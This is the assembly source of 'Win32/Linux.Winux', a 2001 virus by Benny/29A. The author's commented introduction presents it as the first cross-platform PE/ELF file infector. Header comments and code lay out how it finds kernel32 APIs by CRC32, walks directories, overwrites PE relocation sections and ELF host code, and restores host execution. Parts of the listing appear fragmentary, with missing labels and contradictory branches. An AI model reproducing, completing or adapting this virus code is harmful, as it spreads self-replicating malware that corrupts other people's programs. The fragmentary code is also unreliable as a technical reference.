; +-----------------------+
; : Win32/Linux.Winux :
; +--+----------------+---+
; : by Benny/29A :
; +----------------+
;Heya ppl,
;lemme introduce you my first multi-platform virus, the worlds first
;PE/ELF infector. The idea of first Win32/Linux virus came to my head
;when I was learning Linux viruses. I'm not Linux expert, I couldn't
;code for Linux in assembler - I am familiar with Intel syntax, AT&T
;is a bit chaotic for me. However, I decided to learn more about Linux
;coding and left my place of newbee. I was always fascinated of Linux
;scene and low-level programming under Linux but I never knew much
;about it.
;I wanted to code virus for Linux and learn from it. But becoz there
;already exist some viruses and I knew I won't be able to bring any
;new technique, I decided to code something unique -> Win32/Linux
;compatible multi-platform infector. And here you can find the result
;of my trying. Now, after all, I've got some valuable experiencez and
;I'm glad for that. Coding/debugging in Linux was hard for me, but I
;had fun and I learned a lot. And that's the most important.
;- Technical details -
;The virus itself ain't much. It's not big, it's not complicated,
;it's not resident nor polymorphic.. I wanted to be the virus like
;this. Just to show something new, show that something never seen
;before is possible and how can it be coded.
;The virus is devided to two partz: Win32 part and Linux part. Every
;part is able to infect both of PE and ELF filez. This source is
;designed to be compiled by TASM under Win32, nevertheless it can
;infect Linux programz and so then it will be able to be executed
;in Linux environment (and there it is also able to infect
;Win32 part, which can be executed in Win32 environment etc etc etc...).
;Win32 part:
;Virus infects PE filez by overwritting .reloc section, so it does not
;enlarge host file size. Filez that don't have .reloc section, big
;enough for virus code, can't be infected (explorer.exe can be used to
;test infection capabilities). It can pass thru directory tree by well
;known "dotdot" method ("cd ..") and there infects all PE and ELF
;filez - virus does not check extensionz, it analyses victim's internal
;format and then decidez whata do.
;When all filez are passed and/or infected virus will execute host code.
;Linux part:
;Virus infects ELF filez by overwritting host code by viral code. The
;original host code is stored at the end of host file. It can infect
;all filez (both of PE and ELF) in current directory, also without
;checking file extensionz.
;When all filez are passed and/or infected virus will restore host code
;(overwrite itself by original host code) and execute it.
;Well, you are probably asking how it is possible that virus can infect Win32
;appz from Linux environment and Linux appz from Win32 environment. Yeah,
;many ppl already asked me. For instance, under some emulator. There exist
;some emulatorz (win4lin, wine etc..) which are often used to execute Win32
;appz under Linux. Also, I know many ppl that have partition specially
;reserved for CD burning, where they store both of Win32 and Linux programz.
;Virus executed from there has no problemz with infection, heh ;)
;Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and
;RedHat 7.0, and it worked without any problemz. However, if you will find
;any problemz, don't by shy and send me a bug report ;-P
;- Licence agreement -
;This virus is covered by GPL - GNU General Public Licence. All crucial
;facts can be found there. Read it before using!
;- Last notez -
;While I was finishing Universe and coding Winux, many personal thingz
;happened to me. Again such depressive season as only winter can be
;fell down on me.. I'm finishing my high-school, last year, many examz
;(and I know nothing, you know that feeling, heh :) etc. End of next
;stage of my life is getting closer and I don't know how will that next
;one be for me, what it will take and bring to me. I'm looking forward
;to summer, the best season in the year, no depression, no school, no
;fucking problemz I still have and can't hold them all.. c ya l8r,
;somewhere in timespace..
; +-------------+
; : Benny / 29A +-+
; : benny@post.cz +---------+
;(c) March, 2001 : http://benny29a.cjb.net :
;Czech Republic +-------------------------+
.model flat
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
call get_base ;get K32 base address
call get_apis ;find addresses of APIz
lea eax,[ebp + prev_dir - gdelta]
push eax
call [ebp + a_GetCurrentDirectoryA - gdelta]
;get current directory
push 20
pop ecx ;20 passes in directory tree
push ecx
;direct action - infect all PE filez in directory
lea esi,[ebp + WFD - gdelta] ;WIN32_FIND_DATA structure
push esi ;save its address
@pushsz '*.*' ;search for all filez
call [ebp + a_FindFirstFileA - gdelta] ;find first file
inc eax
je e_find ;quit if not found
dec eax
push eax ;save search handle to stack
f_next: call wCheckInfect ;infect found file
push esi ;save WFD structure
push dword ptr [esp+4] ;and search handle from stack
call [ebp + a_FindNextFileA - gdelta];find next file
test eax,eax
jne f_next ;and infect it
call check_elf
je wInfectELF ;is it Linux program (ELF)?
jne close_file
call check_pe
jne close_file ;is it Win32 program (PE)?
;important chex
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne close_file
mov ax,[esi.NT_FileHeader.FH_Characteristics]
je close_file
jne close_file
jne close_file
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
jne close_file
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je close_file
call header&relocs ;get PE headerz and check for relocs
je close_file ;quit if no relocs
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne close_file
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb close_file ;is it large enough?
wInfectELF Proc
mov edi,ecx
movzx eax,word ptr [edi+12h]
cmp eax,3
jne close_file
call get_elf ;get elf headerz
mov eax,[esi+0Ch] ;virtual address
add eax,[esi+14h] ;virtual size
cmp ebx,eax
jb got_section ;does EP fit to this section?
add esi,edx ;no, get to next record
loop p_sectionz ;ECX-timez
jmp close_file ;invalid ELF, quit
mov eax,[esi+14h]
cmp eax,virtual_end-Start
jb close_file ;must be large enough
push eax
push 0
call [ebp + a_VirtualAlloc - gdelta]
test eax,eax ;allocate buffer for host code
je close_file
mov [ebp + a_mem - gdelta],eax
mov ecx,[esi+14h]
mov esi,[esi+10h]
add esi,edi
push esi
xchg eax,edi
rep movsb ;copy host code to our buffer
pop edi
lea esi,[ebp + Start - gdelta]
mov ecx,virtual_end-Start
rep movsb ;overwrite host code by virus body
add dword ptr [edi+18h],LinuxStart-Start
mov [ebp + sucElf - gdelta],edi
jmp close_file ;set semaphore and quit
wInfectELF EndP
;this procedure can retrieve API addresses
get_apis Proc
lea esi,[ebp + crc32s - gdelta] ;get ptr to CRC32 values of APIs
lea edi,[ebp + a_apis - gdelta] ;where to store API addresses
push crc32c ;how many APIs do we need
pop ecx ;in ECX...
g_apis: push eax ;save K32 base
call get_api
stosd ;save address
test eax,eax
pop eax
je q_gpa ;quit if not found
add esi,4 ;move to next CRC32 value
loop g_apis ;search for API addresses in a loop
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;restore all registers
ret ;and quit from procedure
q_gpa: @SEH_RemoveFrame
pop eax
jmp end_host ;quit if error
get_apis EndP
;this procedure can retrieve address of given API
get_api Proc
pushad ;store all registers
@SEH_SetupFrame ;setup SEH frame
mov edi,[eax.MZ_lfanew] ;move to PE header
add edi,eax ;...
mov ecx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size]
jecxz end_gpa ;quit if no exports
mov ebx,eax
add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
mov edx,eax ;get address of export table
add edx,[ebx.ED_AddressOfNames] ;address of API names
mov ecx,[ebx.ED_NumberOfNames] ;number of API names
mov edi,edx
push dword ptr [esi] ;save CRC32 to stack
mov ebp,eax
xor eax,eax
APIname:push eax
mov esi,ebp ;get base
add esi,[edx+eax*4] ;move to API name
push esi ;save address
@endsz ;go to the end of string
sub esi,[esp] ;get string size
mov edi,esi ;move it to EDI
pop esi ;restore address of API name
call CRC32 ;calculate CRC32 of API name
cmp eax,[esp+4] ;is it right API?
pop eax
je g_name ;yeah, we got it
inc eax ;increment counter
loop APIname ;and search for next API name
pop eax
end_gpa:xor eax, eax ;set flag
ok_gpa: @SEH_RemoveFrame ;remove SEH frame
mov [esp.Pushad_eax],eax ;save value to stack
popad ;restore all registers
ret ;quit from procedure
g_name: pop edx
mov edx,ebp
add edx,[ebx.ED_AddressOfOrdinals]
movzx eax,word ptr [edx+eax*2]
cmp eax,[ebx.ED_NumberOfFunctions]
jae end_gpa-1
mov edx,ebp ;base of K32
add edx,[ebx.ED_AddressOfFunctions] ;address of API functions
add ebp,[edx+eax*4] ;get API function address
xchg eax,ebp ;we got address of API in EAX
jmp ok_gpa ;quit
get_api EndP
;this procedure can retrieve base address of K32
get_base Proc
push ebp ;store EBP
call gdlt ;get delta offset
gdlt: pop ebp ;to EBP
mov eax,12345678h ;get lastly used address
last_kern = dword ptr $-4
call check_kern ;is this address valid?
jecxz end_gb ;yeah, we got the address
call gb_table ;jump over the address table
dd 077E00000h ;NT/W2k
dd 077E80000h ;NT/W2k
dd 077ED0000h ;NT/W2k
dd 077F00000h ;NT/W2k
dd 0BFF70000h ;95/98
pop edi ;get pointer to address table
push 4 ;get number of items in the table
pop esi ;to ESI
gbloop: mov eax,[edi+esi*4] ;get item
call check_kern ;is address valid?
jecxz end_gb ;yeah, we got the valid address
dec esi ;decrement ESI
test esi,esi ;end of table?
jne gbloop ;nope, try next item
call scan_kern ;scan the address space for K32
end_gb: pop ebp ;restore EBP
ret ;quit
check_kern: ;check if K32 address is valid
mov ecx,eax ;make ECX != 0
pushad ;store all registers
@SEH_SetupFrame ;setup SEH frame
movzx edx,word ptr [eax] ;get two bytes
add edx,-"ZM" ;is it MZ header?
jne end_ck ;nope
mov ebx,[eax.MZ_lfanew] ;get pointer to PE header
add ebx,eax ;normalize it
mov ebx,[ebx] ;get four bytes
add ebx,-"EP" ;is it PE header?
jne end_ck ;nope
xor ecx,ecx ;we got K32 base address
mov [ebp + last_kern - gdlt],eax ;save K32 base address
end_ck: @SEH_RemoveFrame ;remove SEH frame
mov [esp.Pushad_ecx],ecx ;save ECX
popad ;restore all registers
ret ;if ECX == 0, address was found
SEH_hndlr macro ;macro for SEH
@SEH_RemoveFrame ;remove SEH frame
popad ;restore all registers
add dword ptr [ebp + bAddr - gdlt],1000h ;explore next page
jmp bck ;continue execution
scan_kern: ;scan address space for K32
bck: pushad ;store all registers
@SEH_SetupFrame ;setup SEH frame
mov eax,077000000h ;starting/last address
bAddr = dword ptr $-4
movzx edx,word ptr [eax] ;get two bytes
add edx,-"ZM" ;is it MZ header?
jne pg_flt ;nope
mov edi,[eax.MZ_lfanew] ;get pointer to PE header
add edi,eax ;normalize it
mov ebx,[edi] ;get four bytes
add ebx,-"EP" ;is it PE header?
jne pg_flt ;nope
mov ebx,eax
mov esi,eax
add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add esi,[ebx.ED_Name]
mov esi,[esi]
add esi,-'NREK'
je end_sk
pg_flt: xor ecx,ecx ;we got K32 base address
mov [ecx],esi ;generate PAGE FAULT! search again...
end_sk: mov [ebp + last_kern - gdlt],eax ;save K32 base address
@SEH_RemoveFrame ;remove SEH frame
mov [esp.Pushad_eax],eax ;save EAX - K32 base
popad ;restore all registers
get_base EndP
CRC32: push ecx ;procedure for calculating CRC32s
push edx ;at run-time
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
xor eax,eax
xor ebx,ebx
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
signature db 0,'[Win32/Linux.Winux] multi-platform virus by Benny/29A',0
;little signature of mine ;-)
;Viral entrypoint in Linux programz
push eax ;reserve variable for return to host
mov ebx,[esp.cPushad+8] ;get command line
call lgdelta
lgdelta:pop ebp ;ebp=delta offset
mov ecx,end_end_lhost-end_lhost
sub esp,ecx
mov edi,esp
lea esi,[ebp + end_lhost - lgdelta]
rep movsb ;copy virus to stack and jump there
jmp esp ;(becoz we need to restore host code back)
end_lhost Proc
push ebx
push 125
pop eax
lea ebx,[ebp + Start - lgdelta]
and ebx,0FFFFF000h
mov ecx,3000h
mov edx,7
int 80h ;deprotect code section
pop ebx
push 5
pop eax
xor ecx,ecx
int 80h ;open host file
xchg eax,ebx
test ebx,ebx
jns read_host
q_host: xor eax,eax
inc eax
push -1
pop ebx
int 80h ;quit if error
push 19
pop eax
mov ecx,12345678h
l_lseek = dword ptr $-4
int 80h ;seek to saved host code (EOF - some bytez)
test eax,eax
js q_host
push 5
pop eax
call cur_dir
db '.',0
cur_dir:pop ebx
xor ecx,ecx
int 80h ;get current directory descriptor
xchg eax,ebx
inf_dir:push 89
pop eax
lea ecx,[ebp + WFD - lgdelta]
int 80h ;get file from directory
xchg eax,ecx
jecxz cldir ;no more filez..
add eax,10
call lCheckInfect ;try to infect it
jmp inf_dir ;and look for another file
cldir: push 6
pop eax
int 80h ;close directory descriptor
push 3
pop eax
lea ecx,[ebp + Start - lgdelta]
mov edi,ecx
mov edx,virtual_end-Start
int 80h ;restore host code
test eax,eax
js q_host
push 6
pop eax
int 80h ;close host file descriptor
add esp,end_end_lhost-end_lhost
mov [esp.cPushad],edi ;write host entrypoint address
ret ;and jump to there
xchg eax,ebx
push 5
pop eax
inc edx
inc edx
mov ecx,edx
int 80h ;open file
xchg eax,ebx
test ebx,ebx
jns c_open
c_open: mov [ebp + f_handle - lgdelta],ebx
push 19
pop eax
xor ecx,ecx
int 80h ;seek to EOF = get file size
mov [ebp + l_lseek - lgdelta],eax
;save it
push ecx
push ebx
inc ecx
push ecx
inc ecx
inc ecx
push ecx
push eax
xor ecx,ecx
push ecx
mov ebx,esp
push 90
pop eax
int 80h ;map file to address space
add esp,24
cmp eax,0FFFFF000h
jbe c_mmap ;quit if error
jmp c_file
c_mmap: mov ecx,eax
mov [ebp + fm_handle - lgdelta],eax
call check_elf
je lInfectELF ;is it Linux program (ELF)?
jne c_mfile
call check_pe
jne c_mfile ;is it Win32 program (PE)?
;some important chex
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne c_mfile
mov ax,[esi.NT_FileHeader.FH_Characteristics]
je c_mfile
jne c_mfile
jne c_mfile
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
jne c_mfile
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je c_mfile
call header&relocs ;get PE headerz and check for relocs
je c_mfile ;quit if no relocs
mov ebx,[edi.SH_VirtualAddress]
cmp eax,ebx
jne c_mfile
cmp [edi.SH_SizeOfRawData],virus_end-Start+500
jb c_mfile ;is it large enough?
call set_alignz ;align section variable
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ebx
mov [ebp + original_ep - lgdelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
mov [ebp + image_base - lgdelta],eax
;set some important variablez
mov edi,[edi.SH_PointerToRawData]
add edi,[esp+24]
lea esi,[ebp + Start - lgdelta]
mov ecx,virus_end-Start
rep movsb ;overwrite relocs by virus code
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
;set flag
push 91
pop eax
int 80h ;unmap file
c_file: push 6
pop eax
mov ebx,[ebp + f_handle - lgdelta]
int 80h ;close file descriptor
ret ;and quit
lCheckInfect EndP
lInfectELF Proc
mov edi,ecx
movzx eax,word ptr [edi+12h]
cmp eax,3
jne c_mfile
call get_elf ;get ELF headerz
mov eax,[esi+0Ch] ;virtual address
add eax,[esi+14h] ;virtual size
cmp ebx,eax
jb got_section2 ;does EP fit to this section?
add esi,edx ;no, get to next record
loop p_sectionz2 ;ECX-timez
jmp c_mfile ;invalid ELF, quit
push 91
pop eax
mov ebx,[ebp + fm_handle - lgdelta]
int 80h ;unmap file
push 19
pop eax
mov ebx,[ebp + f_handle - lgdelta]
xor ecx,ecx
inc edx
inc edx
int 80h ;go to EOF
push 4
pop eax
mov ecx,esp
mov edx,virtual_end-Start
int 80h ;write there original host code
add esp,[ebp + s_mem - lgdelta]
popad ;correct stack
jmp c_file ;and close the file
lInfectELF EndP
;check if it is Linux program (ELF)
check_elf Proc
mov eax,[ecx]
push eax
add eax,-464C457Fh
pop eax
check_elf EndP
;check if it is Win32 program (PE)
check_pe Proc
mov eax,[ecx.MZ_lfanew]
add eax,ecx
xchg eax,esi
mov eax,[esi]
check_pe EndP
;get some variablez and check for relocationz in PE file
header&relocs Proc
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
header&relocs EndP
;align section variable
set_alignz Proc
mov eax,virtual_end-Start
cmp eax,[edi.SH_VirtualSize]
jb o_vs
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
div ecx
test edx,edx
je o_al
inc eax
o_al: mul ecx
mov [edi.SH_VirtualSize],eax
o_vs: ret
set_alignz EndP
;get some important variablez from Linux program (ELF)
get_elf Proc
mov ebx,[edi+18h] ;EP
mov esi,[edi+20h] ;section header
add esi,edi ;normalize
movzx edx,word ptr [edi+2Eh] ;size of section header
movzx ecx,word ptr [edi+30h] ;number of sectionz
get_elf EndP
end_lhost EndP
gpl db 'This GNU program is covered by GPL.',0
;licence agreement ;-)